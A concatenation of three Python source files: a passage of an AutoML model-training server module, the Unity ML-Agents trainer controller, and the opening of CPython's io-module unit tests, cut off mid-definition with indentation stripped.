data_details['idforData']=idforData
data_details['status']='In Progress'
fObjScrpt=pathlib.Path(pmmlFile)
data_details['taskName']=fObjScrpt.name
data_details['createdOn']= str(datetime.datetime.now())
data_details['type']= 'NNProject'
data_details['problem_type']= hyperParaUser['problemType']
data_details["newPMMLFileName"]=pmmlFile
nntrainer = mergeTrainingNN.NeuralNetworkModelTrainer()
pID = nntrainer.train(idforData,pmmlFile,tensorboardLogFolder,hyperParaUser,pmmlFile)
data_details['pID']=str(pID)
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
# statusfileLocation=saveStatus+'status.txt'
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
if pID == -1:
# data_details['status']='In Progress'
kerasUtilities.updateStatusOfTraining(statusfileLocation,'Training Failed')
else:
pass
runTemp=[i['idforData'] for i in RUNNING_TASK_MEMORY]
if data_details['idforData'] not in runTemp:
# print ('PPPPPPPPPPPPPPPPPPPP Saved to runningTask')
tempRunMemory=data_details
RUNNING_TASK_MEMORY.append(tempRunMemory)
else:
pass
print ('P'*200)
print ('data_details',data_details)
return JsonResponse(data_details,status=202)
# @csrf_exempt
# @api_view(['POST'])
# @schema(autoMLsendDataSwagger)
def autoMLdataprocess(pathOffile):
def dataReaderForJson(pathOffile):
ww=open(pathOffile,'r')
jD=json.loads(ww.read())
sampeData=pd.DataFrame(jD['values']).transpose()
sampeData.columns=[i['name'] for i in jD['series']]
for j in sampeData.columns:
sampeData[j]=sampeData[j].apply(lambda x: (x['min']+x['max'])/2)
return sampeData
global DATA_MEMORY_OBJS_SKLEARN
# pathOffile=requests.GET['filePath']
if '.json' in pathOffile:
data=dataReaderForJson(pathOffile)
else:
data=pd.read_csv(pathOffile,encoding='latin-1')
idforData=int(time.time())
idforData=str(idforData)+'_autoML'
DATA_MEMORY_OBJS_SKLEARN[idforData]=data
# print(data.shape)
data_details=autoMLutilities.dataDescription(data)
data_details['idforData']=idforData
return JsonResponse(data_details)
# @csrf_exempt
# @api_view(['POST'])
# @schema(autoMLtrainModelSwagger)
def autoMLtrainModel(userInput):
global DATA_MEMORY_OBJS_SKLEARN
# userInput=requests.body
# userInput=json.loads(userInput)
paramToTrainModel=userInput['data']
idforData=userInput['idforData']
data=DATA_MEMORY_OBJS_SKLEARN[idforData]
dataPath=userInput['filePath']
targetVar=userInput['target_variable']
problem_type=userInput['problem_type']
# algorithms=userInput['parameters']['algorithm']
try:
algorithms=userInput['parameters']['algorithm']
if algorithms[0]=='All':
raise Exception("")
except:
if problem_type =='Regression':
algorithms=['ExtraTreeRegressor','GradientBoostingRegressor','DecisionTreeRegressor','LinearSVR',\
'RandomForestRegressor','XGBRegressor','KNeighborsRegressor','LinearRegression','LGBMRegressor']
else:
algorithms=['DecisionTreeClassifier','ExtraTreesClassifier','RandomForestClassifier','GradientBoostingClassifier',\
'KNeighborsClassifier','LinearSVC','LogisticRegression','XGBClassifier','LGBMClassifier']
try:
newPMMLFileName = userInput['newPMMLFileName']
if not newPMMLFileName.endswith('.pmml'):
newPMMLFileName = newPMMLFileName+'.pmml'
except:
newPMMLFileName=idforData+'.pmml'
projectName=idforData
projectPath=logFolder+projectName
dataFolder=projectPath+'/dataFolder/'
tpotFolder=projectPath+'/tpotFolder/'
try:
os.makedirs(projectPath)
os.mkdir(dataFolder)
os.mkdir(tpotFolder)
except Exception as e:
print('>>>>>>>>>>>>>>>>', str(e))
autoMLLock=Lock()
trainer = trainAutoMLV2.AutoMLTrainer(algorithms=algorithms, problemType=problem_type)
train_prc = Process(target=trainer.trainModel,args=(data,logFolder, newPMMLFileName, autoMLLock, userInput))
# train_prc = Process(target=trainAutoMLV2.mainTrainAutoML,args=(data,paramToTrainModel,targetVar,idforData,problem_type,logFolder,newPMMLFileName))
train_prc.start()
pID=train_prc.ident
statusFile=dataFolder+'status'+'.txt'
# sFileText=sFile.read()
# data_details=json.loads(sFileText)
data_details={}
data_details['pID']=str(pID)
data_details['status']='In Progress'
data_details['newPMMLFileName']=newPMMLFileName
data_details['targetVar']=targetVar
data_details['problem_type']=problem_type
data_details['idforData']=idforData
data_details['shape']=data.shape
import pathlib
fVar=pathlib.Path(dataPath)
data_details['taskName']=fVar.name.replace(fVar.suffix,'')#newPMMLFileName.split('/')[-1]
autoMLLock.acquire()
with open(statusFile,'w') as filetosave:
json.dump(data_details, filetosave)
autoMLLock.release()
tempRunMemory={'idforData': projectName,
'status': 'In Progress',
'type': 'AutoMLProject',
'pid': pID,
'createdOn': str(datetime.datetime.now()),
'newPMMLFileName': newPMMLFileName.split('/')[-1]
}
tempRunMemory['taskName']=data_details['taskName']
# print ('>>>>>>>>>>>>>>>>>>>>AutoML',tempRunMemory)
RUNNING_TASK_MEMORY.append(tempRunMemory)
# print ('RUNNING_TASK_MEMORY >>>>>>>>>',RUNNING_TASK_MEMORY)
return JsonResponse(data_details,status=202)
def autoAnomalyModel(userInput):
global DATA_MEMORY_OBJS_SKLEARN
# userInput=requests.body
# userInput=json.loads(userInput)
paramToTrainModel=userInput['data']
idforData=userInput['idforData']
data=DATA_MEMORY_OBJS_SKLEARN[idforData]
dataPath=userInput['filePath']
try:
targetVar=userInput['target_variable']
except:
targetVar=None
try:
problem_type=userInput['problem_type']
except:
problem_type=None
algorithms=userInput['parameters']['algorithm']
try:
newPMMLFileName = userInput['newPMMLFileName']
if not newPMMLFileName.endswith('.pmml'):
newPMMLFileName = newPMMLFileName+'.pmml'
except:
newPMMLFileName=idforData+'.pmml'
projectName=idforData
projectPath=logFolder+projectName
dataFolder=projectPath+'/dataFolder/'
try:
os.makedirs(projectPath)
os.mkdir(dataFolder)
except Exception as e:
print('>>>>>>>>>>>>>>>>', str(e))
autoMLLock=Lock()
trainer = trainAutoMLV2.AnomalyTrainer(algorithms=algorithms, problemType=problem_type)
train_prc = Process(target=trainer.trainAnomalyModel,args=(data,logFolder, newPMMLFileName, autoMLLock, userInput))
# train_prc = Process(target=trainAutoMLV2.mainTrainAutoML,args=(data,paramToTrainModel,targetVar,idforData,problem_type,logFolder,newPMMLFileName))
train_prc.start()
pID=train_prc.ident
statusFile=dataFolder+'status'+'.txt'
# sFileText=sFile.read()
# data_details=json.loads(sFileText)
data_details={}
data_details['pID']=str(pID)
data_details['status']='In Progress'
data_details['newPMMLFileName']=newPMMLFileName
data_details['targetVar']=targetVar
data_details['problem_type']=problem_type
data_details['idforData']=idforData
data_details['shape']=data.shape
import pathlib
fVar=pathlib.Path(dataPath)
data_details['taskName']=fVar.name.replace(fVar.suffix,'')#newPMMLFileName.split('/')[-1]
autoMLLock.acquire()
with open(statusFile,'w') as filetosave:
json.dump(data_details, filetosave)
autoMLLock.release()
tempRunMemory={'idforData': projectName,
'status': 'In Progress',
'type': 'AutoMLProject',
'pid': pID,
'createdOn': str(datetime.datetime.now()),
'newPMMLFileName': newPMMLFileName.split('/')[-1]
}
tempRunMemory['taskName']=data_details['taskName']
print ('>>>>>>>>>>>>>>>>>>>>AutoML',tempRunMemory)
RUNNING_TASK_MEMORY.append(tempRunMemory)
# print ('RUNNING_TASK_MEMORY >>>>>>>>>',RUNNING_TASK_MEMORY)
return JsonResponse(data_details,status=202)
def statusOfModel(idforData):
try:
projectName=idforData
# print ('STep 1')
data_details=autoMLutilities.readStatusFile(projectName)
# print ('STep 2')
data_details['generationInfo']=autoMLutilities.progressOfModel(logFolder,projectName)
# print ('STep 3')
except:
projectName=idforData
# print ('STep 1')
data_details=autoMLutilities.readStatusFile(projectName)
# print ('STep 2')
# print ('MMMMMMMMMMMM',data_details)
# for j in data_details:
# print (j,type(data_details[j]))
return JsonResponse(data_details,status=200)
def trainMRCNN(userInput):
# userInput=requests.body
# userInput=json.loads(userInput)
# print (userInput)
pmmlFile=userInput['filePath']
try:
dataFolder=userInput['dataFolder']
except:
print ('Get Data folder')
try:
tensorboardLogFolder=userInput['tensorboardLogFolder']
except:
tensorboardLogFolder=target_path='./logs/'+''.join(choice(ascii_uppercase) for i in range(12))+'/'
# print ('tensorboardLogFolder',tensorboardLogFolder)
kerasUtilities.checkCreatePath(tensorboardLogFolder)
# batchSize=userInput['batchSize']
epoch=userInput['epoch']
stepsPerEpoch=userInput['stepPerEpoch']
# learningRate=userInput['learningRate']
try:
tensorboardUrl=userInput['tensorboardUrl']
except:
tensorboardUrl=''
# idforData=pmmlFile.split('/')[-1].replace('.pmml','')
idforData=os.path.basename(pmmlFile).replace('.pmml','')+'_MRCNN'
saveStatus=logFolder+idforData+'/'
kerasUtilities.checkCreatePath(saveStatus)
statusfileLocation=saveStatus+'status.txt'
# print("status file generated")
data_details={}
data_details['pmmlFile']=idforData
data_details['dataFolder']=dataFolder
data_details['fileName']=pmmlFile
data_details['tensorboardLogFolder']=tensorboardLogFolder
data_details['tensorboardUrl']=tensorboardUrl
# data_details['batchSize']=batchSize
data_details['epoch']=epoch
data_details['stepsPerEpoch']=stepsPerEpoch
# data_details['learningRate']=learningRate
data_details['idforData']=idforData
data_details['status']='Building Architecture'
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
objtrainer = trainMaskRCNN.ObjectDetetctionModels()
prc = Process(target=objtrainer.train, args=(pmmlFile,dataFolder,statusfileLocation,idforData,epoch,\
tensorboardLogFolder,stepsPerEpoch))
prc.start()
pID = prc.ident
data_details['pID']=str(pID)
if pID == -1:
kerasUtilities.updateStatusOfTraining(statusfileLocation,'Training Failed')
else:
with open(statusfileLocation,'w') as filetosave:
json.dump(data_details, filetosave)
runTemp=[i['idforData'] for i in RUNNING_TASK_MEMORY]
if data_details['idforData'] not in runTemp:
# print ('PPPPPPPPPPPPPPPPPPPP Saved to runningTask')
tempRunMemory={'idforData': idforData,
'status': 'Training Failed' if pID==-1 else 'In Progress',
'createdOn': str(datetime.datetime.now()),
'type': 'ObjectDetectionProject',
'pid':pID,
'newPMMLFileName':idforData+'.pmml'}
tempRunMemory['taskName']=tempRunMemory['newPMMLFileName']
RUNNING_TASK_MEMORY.append(tempRunMemory)
else:
pass
return JsonResponse(data_details,status=202)
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import threading
from typing import Dict, Optional, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
UnityCommunicatorStoppedException,
)
from mlagents.trainers.sampler_class import SamplerManager
from mlagents_envs.timers import (
hierarchical_timer,
timed,
get_timer_stack_for_thread,
merge_gauges,
)
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
from mlagents.trainers.settings import CurriculumSettings
class TrainerController(object):
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
save_freq: int,
meta_curriculum: Optional[MetaCurriculum],
train: bool,
training_seed: int,
sampler_manager: SamplerManager,
resampling_interval: Optional[int],
):
"""
:param output_path: Path to save the model.
:param summaries_dir: Folder to save training summaries.
:param run_id: The sub-directory name for model and summary statistics
:param save_freq: Frequency at which to save model
:param meta_curriculum: MetaCurriculum object which stores information about all curricula.
:param train: Whether to train model, or only run inference.
:param training_seed: Seed to use for Numpy and Tensorflow random number generation.
:param sampler_manager: SamplerManager object handles samplers for resampling the reset parameters.
:param resampling_interval: Specifies number of simulation steps after which reset parameters are resampled.
:param threaded: Whether or not to run trainers in a separate thread. Disable for testing/debugging.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.save_freq = save_freq
self.train_model = train
self.meta_curriculum = meta_curriculum
self.sampler_manager = sampler_manager
self.resampling_interval = resampling_interval
self.ghost_controller = self.trainer_factory.ghost_controller
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
def _get_measure_vals(self):
brain_names_to_measure_vals = {}
if self.meta_curriculum:
for (
brain_name,
curriculum,
) in self.meta_curriculum.brains_to_curricula.items():
# Skip brains that are in the metacurriculum but no trainer yet.
if brain_name not in self.trainers:
continue
if curriculum.measure == CurriculumSettings.MeasureType.PROGRESS:
measure_val = self.trainers[brain_name].get_step / float(
self.trainers[brain_name].get_max_steps
)
brain_names_to_measure_vals[brain_name] = measure_val
elif curriculum.measure == CurriculumSettings.MeasureType.REWARD:
measure_val = np.mean(self.trainers[brain_name].reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
else:
for brain_name, trainer in self.trainers.items():
measure_val = np.mean(trainer.reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
return brain_names_to_measure_vals
@timed
def _save_model(self):
"""
Saves current model to checkpoint folder.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].save_model(name_behavior_id)
self.logger.info("Saved Model")
def _save_model_when_interrupted(self):
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
self._save_model()
def _export_graph(self):
"""
Exports latest saved models to .nn format for Unity embedding.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].export_model(name_behavior_id)
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
sampled_reset_param = self.sampler_manager.sample_all()
new_meta_curriculum_config = (
self.meta_curriculum.get_config() if self.meta_curriculum else {}
)
sampled_reset_param.update(new_meta_curriculum_config)
env.reset(config=sampled_reset_param)
def _should_save_model(self, global_step: int) -> bool:
return (
global_step % self.save_freq == 0 and global_step != 0 and self.train_model
)
def _not_done_training(self) -> bool:
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
try:
trainer = self.trainers[brain_name]
except KeyError:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.external_brains[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.time_horizon,
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
global_step = 0
last_brain_behavior_ids: Set[str] = set()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
external_brain_behavior_ids = set(env_manager.external_brains.keys())
new_behavior_ids = external_brain_behavior_ids - last_brain_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
last_brain_behavior_ids = external_brain_behavior_ids
n_steps = self.advance(env_manager)
for _ in range(n_steps):
global_step += 1
self.reset_env_if_ready(env_manager, global_step)
if self._should_save_model(global_step):
self._save_model()
# Stop advancing trainers
self.join_threads()
# Final save Tensorflow model
if global_step != 0 and self.train_model:
self._save_model()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
UnityCommunicatorStoppedException,
) as ex:
self.join_threads()
if self.train_model:
self._save_model_when_interrupted()
if isinstance(ex, KeyboardInterrupt) or isinstance(
ex, UnityCommunicatorStoppedException
):
pass
else:
# If the environment failed, we want to make sure to raise
# the exception so we exit the process with an return code of 1.
raise ex
finally:
if self.train_model:
self._export_graph()
def end_trainer_episodes(
self, env: EnvManager, lessons_incremented: Dict[str, bool]
) -> None:
self._reset_env(env)
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
for brain_name, changed in lessons_incremented.items():
if changed:
self.trainers[brain_name].reward_buffer.clear()
def reset_env_if_ready(self, env: EnvManager, steps: int) -> None:
if self.meta_curriculum:
# Get the sizes of the reward buffers.
reward_buff_sizes = {
k: len(t.reward_buffer) for (k, t) in self.trainers.items()
}
# Attempt to increment the lessons of the brains who
# were ready.
lessons_incremented = self.meta_curriculum.increment_lessons(
self._get_measure_vals(), reward_buff_sizes=reward_buff_sizes
)
else:
lessons_incremented = {}
# If any lessons were incremented or the environment is
# ready to be reset
meta_curriculum_reset = any(lessons_incremented.values())
# Check if we are performing generalization training and we have finished the
# specified number of steps for the lesson
generalization_reset = (
not self.sampler_manager.is_empty()
and (steps != 0)
and (self.resampling_interval)
and (steps % self.resampling_interval == 0)
)
ghost_controller_reset = self.ghost_controller.should_reset()
if meta_curriculum_reset or generalization_reset or ghost_controller_reset:
self.end_trainer_episodes(env, lessons_incremented)
@timed
def advance(self, env: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
num_steps = env.advance()
# Report current lesson
if self.meta_curriculum:
for brain_name, curr in self.meta_curriculum.brains_to_curricula.items():
if brain_name in self.trainers:
self.trainers[brain_name].stats_reporter.set_stat(
"Environment/Lesson", curr.lesson_num
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def join_threads(self, timeout_seconds: float = 1.0) -> None:
"""
Wait for threads to finish, and merge their timer information into the main thread.
:param timeout_seconds:
:return:
"""
self.kill_trainers = True
for t in self.trainer_threads:
try:
t.join(timeout_seconds)
except Exception:
pass
with hierarchical_timer("trainer_threads") as main_timer_node:
for trainer_thread in self.trainer_threads:
thread_timer_stack = get_timer_stack_for_thread(trainer_thread)
if thread_timer_stack:
main_timer_node.merge(
thread_timer_stack.root,
root_name="thread_root",
is_parallel=True,
)
merge_gauges(thread_timer_stack.gauges)
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
ADDRESS_SANITIZER = (
'-fsanitize=address' in _cflags
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
